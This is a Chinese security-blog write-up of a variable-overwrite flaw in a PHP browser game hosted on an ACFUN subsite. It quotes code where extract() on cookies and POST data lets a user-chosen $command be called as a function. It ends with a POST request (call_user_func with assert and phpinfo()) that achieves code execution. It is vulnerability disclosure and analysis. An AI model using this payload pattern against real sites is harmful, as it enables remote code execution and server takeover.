频道栏目
首页 > 安全 > 网站安全 > 正文
ACFUN分站再次GETSHELL变量覆盖漏洞分析与利用
2013-06-28 09:28:06           
收藏   我要投稿

常在河边走哪有不湿鞋?extract + global早晚是要出问题的..

 直接进入正题:

\include\common.inc.php -Line12

require GAME_ROOT.'./include/global.func.php';
error_reporting(E_ALL);
set_error_handler('gameerrorhandler');
$magic_quotes_gpc = get_magic_quotes_gpc();
extract(gstrfilter($_COOKIE));
extract(gstrfilter($_POST));
$_GET = gstrfilter($_GET);
$_REQUEST = gstrfilter($_REQUEST);
$_FILES = gstrfilter($_FILES);//哈?

require GAME_ROOT.'./config.inc.php';


后引入config避免覆盖重要变量.

 

gstrfilter过滤:

\include\global.inc.php -Line48


 

function gstrfilter($str) {
 if(is_array($str)) {
  foreach($str as $key => $val) {
   $str[$key] = gstrfilter($val);
  }
 } else {  
  if($GLOBALS['magic_quotes_gpc']) {
   $str = stripslashes($str);
  }
  $str = str_replace("'","",$str);//屏蔽单引号'
  $str = str_replace("\\","",$str);//屏蔽反斜杠/
  $str = htmlspecialchars($str,ENT_COMPAT);//转义html特殊字符,即"<>&
 }
 return $str;
}

 

重要变量靠'现取现用'再加上过滤就可以从一定程度上避免因为偷懒拼接sqlquery产生的问题了..至少在大部分代码中没问题..

 

 

关键在这里:

\command.php -Line3


 

require './include/common.inc.php';
//$t_s=getmicrotime();
//require_once GAME_ROOT.'./include/JSON.php';
require GAME_ROOT.'./include/game.func.php';
require config('combatcfg',$gamecfg);

\command.php -Line92


if($mode !== 'combat' && $mode !== 'corpse' && strpos($action,'pacorpse')===false && $mode !== 'senditem'){
   $action = '';
  }
  if($command == 'menu') {
   $mode = 'command';
   $action = '';
  } elseif($mode == 'command') {
   if($command == 'move') {
    include_once GAME_ROOT.'./include/game/search.func.php';
    move($moveto);
    if($coldtimeon){$cmdcdtime=$movecoldtime;}
   } elseif($command == 'search') {
    include_once GAME_ROOT.'./include/game/search.func.php';
    search();
    if($coldtimeon){$cmdcdtime=$searchcoldtime;}
   } elseif(strpos($command,'itm') === 0) {
    include_once GAME_ROOT.'./include/game/item.func.php';
    $item = substr($command,3);
    itemuse($item);
    if($coldtimeon){$cmdcdtime=$itemusecoldtime;}
   } elseif(strpos($command,'rest') === 0) {
    if($command=='rest3' && !in_array($pls,$hospitals)){
     $log .= '<span class="yellow">你所在的位置并非医院,不能静养!</span><br>';
    }else{
     $state = substr($command,4,1);
     $mode = 'rest';
    }
   } elseif($command == 'itemmain') {
    $mode = $itemcmd;
   } elseif($command == 'song') {
    $sname=trim(trim($art,'【'),'】');
    include_once GAME_ROOT.'./include/game/song.inc.php';
    //$log.=$sname;
    sing($sname);
   }elseif($command == 'sync') {
    include_once GAME_ROOT.'./include/game/special.func.php';
    syncro($sp_cmd);
    $mode='command';
   }elseif($command == 'special') {
    if($sp_cmd == 'sp_word'){
     include_once GAME_ROOT.'./include/game/special.func.php';
     getword();
     $mode = $sp_cmd;
    }elseif($sp_cmd == 'sp_adtsk'){
     include_once GAME_ROOT.'./include/game/special.func.php';
     adtsk();
     $mode = 'command';
    }elseif($sp_cmd == 'sp_pbomb'){
     $mode = 'sp_pbomb';
    }elseif($sp_cmd == 'sp_weapon'){
     include_once GAME_ROOT.'./include/game/special.func.php';
     weaponswap();
     $mode = 'command';
     if($coldtimeon){$cmdcdtime=$weaponswapcoldtime;}
    }elseif($sp_cmd == 'oneonone'){
     $mode='oneonone';
    }elseif($sp_cmd == 'sp_skpts'){
     include_once GAME_ROOT.'./include/game/clubskills.func.php';
     calcskills($skarr);
     $p12[1]=1; $p12[2]=2;
     $mode='sp_skpts';
    }else{
     $mode = $sp_cmd;
    }
    
   } elseif($command == 'team') {
    include_once GAME_ROOT.'./include/game/team.func.php';
    if($teamcmd == 'teamquit') {    
     teamquit();
    } else{
     teamcheck();
    }
   }
   //省略一部分..直接进入最后逻辑
  } elseif($mode == 'senditem') {
   include_once GAME_ROOT.'./include/game/battle.func.php';
   senditem();
  } elseif($mode == 'combat') {
   include_once GAME_ROOT.'./include/game/combat.func.php';
   combat(1,$command);
  } elseif($mode == 'rest') {
   include_once GAME_ROOT.'./include/state.func.php';
   rest($command);
//  } elseif($mode == 'chgpassword') {
//   include_once GAME_ROOT.'./include/game/special.func.php';
//   chgpassword($oldpswd,$newpswd,$newpswd2);
//  } elseif($mode == 'chgword') {
//   include_once GAME_ROOT.'./include/game/special.func.php';
//   chgword($newmotto,$newlastword,$newkillmsg);
  } elseif($mode == 'corpse') {
   include_once GAME_ROOT.'./include/game/itemmain.func.php';
   getcorpse($command);
  } elseif($mode == 'team') {
   include_once GAME_ROOT.'./include/game/team.func.php';
   $command($nteamID,$nteamPass);//<----------
  }

 

team.func.php中存在两个方法,建立队伍function teammake($tID,$tPass)和加入队伍 function teamjoin($tID,$tPass),依靠$command传来的指令选择,但是感觉像是程序员在偷懒的时候忘记了上面extract解包?

 

 


构造请求:

$_POST['mode']='team',

$_POST['command']='call_user_func',

$_POST['nteamID']='assert',

$_POST['nteamPass']='phpinfo()'。


 

 修复方案:


别偷懒..

点击复制链接 与好友分享!回本站首页
上一篇:GET参数SQL注入%0A换行污染绕过
下一篇:腾讯QQ群论坛储存型xss
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站